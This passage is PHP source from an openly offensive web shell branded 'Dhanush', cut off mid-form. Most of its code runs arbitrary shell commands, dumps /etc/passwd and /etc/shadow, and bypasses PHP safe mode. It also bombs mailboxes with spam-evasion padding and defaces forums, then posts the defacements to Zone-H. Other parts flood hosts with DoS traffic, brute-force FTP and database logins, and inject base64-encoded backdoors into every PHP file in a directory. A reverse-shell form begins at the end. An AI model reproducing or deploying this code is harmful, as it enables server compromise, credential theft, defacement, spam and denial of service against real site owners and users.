4812 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4813 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4814 ++$i;
4815 }
4816
4817 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4818}
4819else if(isset($_GET['executemycmd']))
4820{
4821 $comm = $_GET['executemycmd'];
4822 chdir($_GET['executepath']);
4823 echo shell_exec($comm);
4824}
4825// View Passwd file
4826else if(isset($_GET['passwd']))
4827{
4828 $test='';
4829 $tempp= tempnam($test, "cx");
4830 $get = "/etc/passwd";
4831 $name=@posix_getpwuid(@fileowner($get));
4832 $group=@posix_getgrgid(@filegroup($get));
4833 $owner = $name['name']. " / ". $group['name'];
4834 ?>
4835 <table style="width:57%;">
4836 <tr>
4837 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4838 </tr>
4839 <tr>
4840 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4841 </tr>
4842 </table>
4843 <?php
4844 if(copy("compress.zlib://".$get, $tempp))
4845 {
4846 $fopenzo = fopen($tempp, "r");
4847 $freadz = fread($fopenzo, filesize($tempp));
4848 fclose($fopenzo);
4849 $source = htmlspecialchars($freadz);
4850 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4851 unlink($tempp);
4852 }
4853 else
4854 {
4855 ?>
4856 <form>
4857 <input type="hidden" name="etcpasswd">
4858 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4859 <tr>
4860 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4861 </tr>
4862 <tr>
4863 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4864 </tr>
4865 <tr>
4866 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4867 </tr>
4868 </table><br>
4869 </form>
4870 <?php
4871 }
4872 ?>
4873 <br />
4874 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4875 <?php
4876}
4877else if(isset($_GET['shadow']))
4878{
4879 $test='';
4880 $tempp= tempnam($test, "cx");
4881 $get = "/etc/shadow";
4882 if(copy("compress.zlib://".$get, $tempp))
4883 {
4884 $fopenzo = fopen($tempp, "r");
4885 $freadz = fread($fopenzo, filesize($tempp));
4886 fclose($fopenzo);
4887 $source = htmlspecialchars($freadz);
4888 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4889 unlink($tempp);
4890 }
4891}
4892else if(isset($_GET['bomb']))
4893{
4894 ?><div id="showmail"></div>
4895 <form>
4896 <table id="margins" style="width:100%;">
4897 <tr>
4898 <td style="width:30%;">To</td>
4899 <td>
4900 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4901 </td>
4902 </tr>
4903 <tr>
4904
4905 <td style="width:30%;">Subject</td>
4906 <td>
4907 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4908 </td>
4909 </tr>
4910 <tr>
4911 <td style="width:30%;">No. of Times</td>
4912 <td>
4913 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4914 </td>
4915 </tr>
4916 <tr>
4917 <td style="width:30%;">Pad your message (Less spam detection)</td>
4918 <td><input type="checkbox" name="padding"/></td>
4919 </tr>
4920 <tr>
4921 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4922 </tr>
4923 <tr>
4924 <td rowspan="2">
4925 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4926 </td>
4927 </tr>
4928 </table>
4929 </form>
4930 <?php
4931}
4932
4933//Mass Mailer
4934else if(isset($_GET['mail']))
4935{
4936 ?><div id="showmail"></div>
4937 <div align="left">
4938 <form>
4939 <table align="left" style="width:100%;">
4940 <tr>
4941 <td style="width:10%;">From</td>
4942 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4943 </tr>
4944
4945 <tr>
4946 <td style="width:20%;">To</td>
4947 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4948 </tr>
4949
4950 <tr>
4951 <td style="width:20%;">Subject</td>
4952 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4953 </tr>
4954
4955
4956 <tr>
4957 <td colspan="2">
4958 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4959 </td>
4960 </tr>
4961
4962
4963 <tr>
4964 <td rowspan="2">
4965 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4966 </td>
4967 </tr>
4968 </table>
4969 </form></div>
4970 <?php
4971}
4972// Get Domains
4973else if(isset($_REQUEST["symlinkserver"]))
4974{
4975 ?>
4976 <center><table><tr>
4977 <td><a href=javascript:void(0) onClick="getdata('perlsymlink')"><font class=txt><b>| Perl Symlink |</b></font></a></td>
4978 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4979 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4980 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4981 </tr></table></center><br>
4982 <div id="showdata"></div><?php
4983}
4984// Forum Manager
4985else if(isset($_REQUEST["forum"]))
4986{ ?>
4987 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4988 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4989 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4990 </tr></table></center><br><div id="showdata"></div>
4991 <?php
4992}
4993// Sec info
4994else if(isset($_GET['secinfo']))
4995{ ?><div id=showdata></div>
4996<center><div id="showmydata"></div>
4997</center>
4998<br><center><font size=5>Server security information</font><br><br></center>
4999 <table class="btmtbl" style="width:100%;" border="1">
5000 <tr>
5001 <td style="width:7%;">Curl</td>
5002 <td style="width:7%;">Oracle</td>
5003 <td style="width:7%;">MySQL</td>
5004 <td style="width:7%;">MSSQL</td>
5005 <td style="width:7%;">PostgreSQL</td>
5006 <td style="width:12%;">Open Base Directory</td>
5007 <td style="width:10%;">Safe_Exec_Dir</td>
5008 <td style="width:7%;">PHP Version</td>
5009 <td style="width:7%;">Magic Quotes</td>
5010 <td style="width:7%;">Server Admin</td>
5011 </tr>
5012 <tr>
5013 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
5014 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
5015 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
5016 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
5017 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
5018 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
5019 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
5020 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
5021 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
5022 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
5023 </tr>
5024</table><br> <?php
5025 mysecinfo();
5026}
5027// Code Injector
5028
5029else if(isset($_GET['injector']))
5030{
5031 if($os != "Windows")
5032 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
5033 /*
5034 $injectcode -> isinya
5035
5036 <?php $cmd = <<<EOD
5037 cmd
5038 EOD;
5039
5040 if(isset($_REQUEST[$cmd])) {
5041 system($_REQUEST[$cmd]); } ?>
5042 */
5043 else
5044 {
5045 $injectcode = "PD9waHAgJHBhc3N3cmQgPSA8PDxFT0QKNjJhYTZhOWE1ZGEwMDAxNDI4MGZlODU2YzI3MzhiMDYKRU9EOwokZGhwYXNzd2QgPSA8PDxFT0QKZGhwYXNzd2QKRU9EOwokdXBsb2FkZWQgPSA8PDxFT0QKdXBsb2FkZWQKRU9EOwokbmFtZSA9IDw8PEVPRApuYW1lCkVPRDsKJHRtcF9uYW1lID0gPDw8RU9ECnRtcF9uYW1lCkVPRDsKaWYgKGlzc2V0ICgkX0dFVFskZGhwYXNzd2RdKSBhbmQgbWQ1KCRfR0VUWyRkaHBhc3N3ZF0pPT0kcGFzc3dyZCkKez8+PGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIG1ldGhvZD1QT1NUIGFjdGlvbj0+dXBsb2FkOiA8aW5wdXQgbmFtZT11cGxvYWRlZCB0eXBlPWZpbGUgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9VXBsb2FkIC8+PC9mb3JtPgo8P3BocCAKaWYoaXNzZXQoJF9GSUxFU1skdXBsb2FkZWRdWyRuYW1lXSkpCnsKJHVwbG9hZGVkID0gPDw8RU9ECnVwbG9hZGVkCkVPRDsKJHRhcmdldF9wYXRoID0gPDw8RU9ECi4vCkVPRDsKJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoIC4gYmFzZW5hbWUoICRfRklMRVNbJHVwbG9hZGVkXVskbmFtZV0pOwppZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1skdXBsb2FkZWRdWyR0bXBfbmFtZV0sICR0YXJnZXRfcGF0aCkpIHtlY2hvICR1cGxvYWRlZDt9fX0KPz4=";
5046 /*
5047 $injectcode == found hidden upoader
5048
5049 <?php $passwrd = <<<EOD
5050 62aa6a9a5da00014280fe856c2738b06
5051 EOD;
5052 $dhpasswd = <<<EOD
5053 dhpasswd
5054 EOD;
5055 $uploaded = <<<EOD
5056 uploaded
5057 EOD;
5058 $name = <<<EOD
5059 name
5060 EOD;
5061 $tmp_name = <<<EOD
5062 tmp_name
5063 EOD;
5064 if (isset ($_GET[$dhpasswd]) and md5($_GET[$dhpasswd])==$passwrd)
5065 {?><form enctype=multipart/form-data method=POST action=>upload: <input name=uploaded type=file /><input type=submit value=Upload /></form>
5066 <?php
5067 if(isset($_FILES[$uploaded][$name]))
5068 {
5069 $uploaded = <<<EOD
5070 uploaded
5071 EOD;
5072 $target_path = <<<EOD
5073 ./
5074 EOD;
5075 $target_path = $target_path . basename( $_FILES[$uploaded][$name]);
5076 if(move_uploaded_file($_FILES[$uploaded][$tmp_name], $target_path)) {echo $uploaded;}}}
5077 ?>
5078
5079
5080 */
5081
5082
5083
5084 }
5085 ?>
5086 <form method='POST'>
5087 <table id="margins">
5088 <tr>
5089 <td width="100" class="title">
5090 Directory
5091 </td>
5092 <td>
5093 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
5094 </td>
5095
5096 </tr>
5097 <tr>
5098 <td class="title">
5099 Mode
5100 </td>
5101 <td>
5102 <select style="width: 400px;" name="mode" class="box">
5103 <option value="Apender">Apender</option>
5104 <option value="Overwriter">Overwriter</option>
5105 </select>
5106 </td>
5107 </tr>
5108 <tr>
5109 <td class="title">
5110 File Type
5111 </td>
5112 <td>
5113 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
5114 </td>
5115 </tr>
5116 <tr>
5117 <td>Create A backdoor by injecting this code in every php file of current directory</td>
5118 </tr>
5119
5120 <tr>
5121 <td colspan="2"><?php if($os == "Windows"){echo "<i>Default Password is : <b>Dhanush</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Dhanush";}else{if(!function_exists('system')){echo "system() function disabled";}} ?><BR>
5122 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
5123 </td>
5124 </tr>
5125 <tr>
5126 <td rowspan="2">
5127 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
5128 </td>
5129 </tr>
5130 </form>
5131 </table><div id="showinject"</div>
5132 <?php
5133}
5134// Bypass
5135else if(isset($_GET["bypass"]))
5136{
5137 ?><center><div id="showmydata"></div></center>
5138 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
5139 <tr>
5140 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
5141 </tr>
5142 <tr>
5143 <td align="center">
5144 <p>Using copy() function</p>
5145 <form onSubmit="bypassfun('copy',copy.value);return false;">
5146 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
5147 </form>
5148 </td>
5149 <td align="center">
5150 <p>Using File contents function</p>
5151 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
5152 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
5153 </form>
5154 </td>
5155 </tr>
5156
5157 <tr>
5158 <td align="center">
5159 <p>Using Stream contents function</p>
5160 <form onSubmit="bypassfun('stream',stream.value);return false;">
5161 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
5162 </form>
5163 </td>
5164 <td align="center">
5165 <p>Using Curl() function</p>
5166 <form onSubmit="bypassfun('curl',curl.value);return false;">
5167 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
5168 </form>
5169 </td>
5170 </tr>
5171
5172 <tr>
5173 <td align="center">
5174 <p>Bypass using include()</p>
5175 <form onSubmit="bypassfun('include',include.value);return false;">
5176 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
5177 </form>
5178 </td>
5179 <td align="center">
5180 <p>Using id() function</p>
5181 <form onSubmit="bypassfun('id',id.value);return false;">
5182 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
5183 </form>
5184 </td>
5185 </tr>
5186
5187 <tr>
5188 <td align="center">
5189 <p>Using tempnam() function</p>
5190 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
5191 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
5192 </form>
5193 </td>
5194 <td align="center">
5195 <p>Using symlink() function</p>
5196 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
5197 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
5198 </form>
5199 </td>
5200 </tr>
5201 <tr>
5202 <td colspan=2 align="center">
5203 <p>Using Bypass function</p>
5204 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
5205 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
5206 <select id="optiontype" class=sbox>
5207 <option value="tac">tac</option>
5208 <option value="more">more</option>
5209 <option value="less">less</option>
5210 <option value="rev">rev</option>
5211 <option value="xxd">xxd</option>
5212 <option value="awk">awk</option>
5213 </select>
5214 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
5215 </form>
5216 </td>
5217
5218 </tr>
5219 </table>
5220 </form>
5221 <?php
5222}
5223//fuzzer
5224else if(isset($_GET['fuzz']))
5225{
5226 ?>
5227 <form method="GET">
5228 <table id="margins">
5229 <tr>
5230 <td width="400" class="title">
5231 IP
5232 </td>
5233 <td>
5234 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5235 </td>
5236 </tr>
5237
5238 <tr>
5239 <td class="title">
5240 Port
5241 </td>
5242 <td>
5243 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5244 </td>
5245 </tr>
5246
5247 <tr>
5248 <td class="title">
5249 Timeout
5250 </td>
5251 <td>
5252 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
5253 </td>
5254 </tr>
5255
5256
5257 <tr>
5258 <td class="title">
5259 No of times
5260 </td>
5261 <td>
5262 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
5263 </td>
5264 </tr>
5265
5266 <tr>
5267 <td class="title">
5268 Message (The message Should be long and it will be multiplied with the value after it)
5269 </td>
5270 <td>
5271 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
5272 </td>
5273 <td>
5274 x
5275 </td>
5276 <td width="20">
5277 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
5278 </td>
5279 </tr>
5280
5281 <tr>
5282 <td rowspan="2">
5283 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
5284 </td>
5285 </tr>
5286 </table>
5287 </form><div id="showdos"></div>
5288 <?php
5289}
5290// Zone-h Poster
5291 else if(isset($_GET["zone"]))
5292 {
5293 if(!function_exists('curl_version'))
5294 {
5295 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
5296 }
5297 ?>
5298 <center><font size="4">Zone-h Poster</font></center>
5299 <form action="<?php echo $self; ?>" method="post">
5300 <table align="center" cellpadding="5" border="0">
5301 <tr>
5302 <td>
5303 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
5304 <tr><td>
5305 <select name="hackmode" class="box">
5306 <option >--------SELECT--------</option>
5307 <option value="1">known vulnerability (i.e. unpatched system)</option>
5308 <option value="2" >undisclosed (new) vulnerability</option>
5309 <option value="3" >configuration / admin. mistake</option>
5310 <option value="4" >brute force attack</option>
5311 <option value="5" >social engineering</option>
5312 <option value="6" >Web Server intrusion</option>
5313 <option value="7" >Web Server external module intrusion</option>
5314 <option value="8" >Mail Server intrusion</option>
5315 <option value="9" >FTP Server intrusion</option>
5316 <option value="10" >SSH Server intrusion</option>
5317 <option value="11" >Telnet Server intrusion</option>
5318 <option value="12" >RPC Server intrusion</option>
5319 <option value="13" >Shares misconfiguration</option>
5320 <option value="14" >Other Server intrusion</option>
5321 <option value="15" >SQL Injection</option>
5322 <option value="16" >URL Poisoning</option>
5323 <option value="17" >File Inclusion</option>
5324 <option value="18" >Other Web Application bug</option>
5325 <option value="19" >Remote administrative panel access bruteforcing</option>
5326 <option value="20" >Remote administrative panel access password guessing</option>
5327 <option value="21" >Remote administrative panel access social engineering</option>
5328 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5329 <option value="23" >Access credentials through Man In the Middle attack</option>
5330 <option value="24" >Remote service password guessing</option>
5331 <option value="25" >Remote service password bruteforce</option>
5332 <option value="26" >Rerouting after attacking the Firewall</option>
5333 <option value="27" >Rerouting after attacking the Router</option>
5334 <option value="28" >DNS attack through social engineering</option>
5335 <option value="29" >DNS attack through cache poisoning</option>
5336 <option value="30" >Not available</option>
5337 </select>
5338 </td></tr>
5339 <tr><td>
5340 <select name="reason" class="box">
5341 <option >--------SELECT--------</option>
5342 <option value="1" >Heh...just for fun!</option>
5343 <option value="2" >Revenge against that website</option>
5344 <option value="3" >Political reasons</option>
5345 <option value="4" >As a challenge</option>
5346 <option value="5" >I just want to be the best defacer</option>
5347 <option value="6" >Patriotism</option>
5348 <option value="7" >Not available</option>
5349 </select></td></tr>
5350 <tr><td>
5351 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5352 <tr><td>
5353 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5354 </form><div id="showzone"></div>
5355 <?php }
5356//DDos
5357 else if(isset($_GET['dos']))
5358 {
5359 ?>
5360 <form method="GET">
5361 <table id="margins">
5362 <tr>
5363 <td width="400" class="title">
5364 IP
5365 </td>
5366 <td>
5367 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5368 </td>
5369 </tr>
5370
5371 <tr>
5372 <td class="title">
5373 Port
5374 </td>
5375 <td>
5376 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5377 </td>
5378 </tr>
5379
5380 <tr>
5381 <td class="title">
5382 Timeout <font >(Time in seconds)</font>
5383 </td>
5384 <td>
5385 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5386 </td>
5387 </tr>
5388 <tr>
5389 <td class="title">
5390 Execution Time <font >(Time in seconds)</font>
5391 </td>
5392 <td>
5393 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5394 </td>
5395 </tr>
5396 <tr>
5397 <td class="title">
5398 No of Bytes per/packet
5399 </td>
5400 <td>
5401 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5402 </td>
5403 </tr>
5404 <tr>
5405 <td rowspan="2">
5406 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
5407 </td>
5408 </tr>
5409 </table>
5410 </form><div id="showdos"></div>
5411 <?php
5412}
5413else if(isset($_GET['mailbomb']))
5414{ ?>
5415 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5416 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5417<?php
5418}
5419else if(isset($_GET['tools']))
5420 {
5421 ?>
5422 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5423 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5424 <tr>
5425 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5426 </tr>
5427 <tr>
5428 <td align="center">
5429 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5430 </td>
5431 <td align="center">
5432 <select class="sbox" name='protocol'>
5433 <option value='tcp'>tcp</option>
5434 <option value='udp'>udp</option>
5435 </select>
5436 </td>
5437 <tr>
5438 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5439 </tr>
5440 </form>
5441 <tr><td colspan=2><div id="showports"></div>
5442 </td></tr></table>
5443
5444 <br>
5445 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5446 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5447 <tr>
5448 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5449 </tr>
5450 <tr>
5451 <td>Type : </td>
5452 <td>
5453 <select name="prototype" class="sbox">
5454 <option value="ftp">FTP</option>
5455 <option value="mysql">MYSQL</option>
5456 <option value="postgresql">PostgreSql</option>
5457 </select>
5458 </td>
5459 </tr>
5460 <tr>
5461 <td>Server <b>:</b> Port : </td>
5462 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5463 </tr>
5464 <tr>
5465 <td valign="middle">Brute type : </td>
5466 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5467 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5468 Login : <input type="text" name="login" value="root" class="sbox"><br>
5469 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5470 </td>
5471 </tr>
5472 <tr>
5473 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5474 </tr>
5475 </form><tr><td colspan="2" id="showbrute"></td></tr>
5476 </table>
5477 </center><br>
5478 <?php
5479}
5480else if (isset($_GET["phpc"]))
5481{
5482 ?>
5483 <div id="showresult"></div>
5484 <form name="frm">
5485 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5486 <br /><br />
5487 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5488 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5489 </form>
5490 <?php
5491}
5492else if(isset($_GET["exploit"]))
5493{
5494 if(!isset($_GET["rootexploit"]))
5495 {
5496 ?>
5497 <center>
5498 <form action="<?php echo $self; ?>" method="get" target="_blank">
5499 <input type="hidden" name="exploit">
5500 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5501 <tr>
5502 <td style="height:60px;">
5503 <font size="4" class=txt>Select Website</font></td><td>
5504 <p><select id="rootexploit" name="rootexploit" class="box">
5505 <option value="exploit-db">Exploit-db</option>
5506 <option value="packetstormsecurity">Packetstormsecurity</option>
5507 <option value="exploitsearch">Exploitsearch</option>
5508 <option value="shodanhq">Shodanhq</option>
5509 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5510 <input type="submit" value="Search" class="but"></td></tr></table>
5511 </form></center><br>
5512
5513 <?php
5514 }
5515 else
5516 {
5517 //exploit search
5518 $Lversion = php_uname(r);
5519 $OSV = php_uname(s);
5520 if(eregi('Linux',$OSV))
5521 {
5522 $Lversion=substr($Lversion,0,6);
5523 if($_GET['rootexploit'] == "exploit-db")
5524 {
5525 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5526 }
5527 else if($_GET['rootexploit'] == "packetstormsecurity")
5528 {
5529 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5530 }
5531 else if($_GET['rootexploit'] == "exploitsearch")
5532 {
5533 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5534 }
5535 else if($_GET['rootexploit'] == "shodanhq")
5536 {
5537 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5538 }
5539 }
5540 else
5541 {
5542 $Lversion=substr($Lversion,0,3);
5543 if($_GET['rootexploit'] == "exploit-db")
5544 {
5545 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5546 }
5547 else if($_GET['rootexploit'] == "packetstormsecurity")
5548 {
5549 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5550 }
5551 else if($_GET['rootexploit'] == "exploitsearch")
5552 {
5553 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5554 }
5555 else if($_GET['rootexploit'] == "shodanhq")
5556 {
5557 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5558 }
5559 }
5560 //End of Exploit search
5561 }
5562}
5563// Connect
5564else if(isset($_REQUEST['connect']))
5565{
5566 ?>
5567 <form action='<?php echo $self; ?>' method='POST' >
5568 <table style="width:50%" align="center" >
5569 <tr>
5570 <th colspan="1" width="50px">Reverse Shell</th>
5571 <th colspan="1" width="50px">Bind Shell</th>
5572 </tr>
5573 <tr>
5574 <td>
5575 <table style="border-spacing: 6px;">
5576 <tr>
5577 <td>IP </td>
5578 <td>
5579 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5580 </td>
5581 </tr>
5582 <tr>
5583 <td>Port </td>
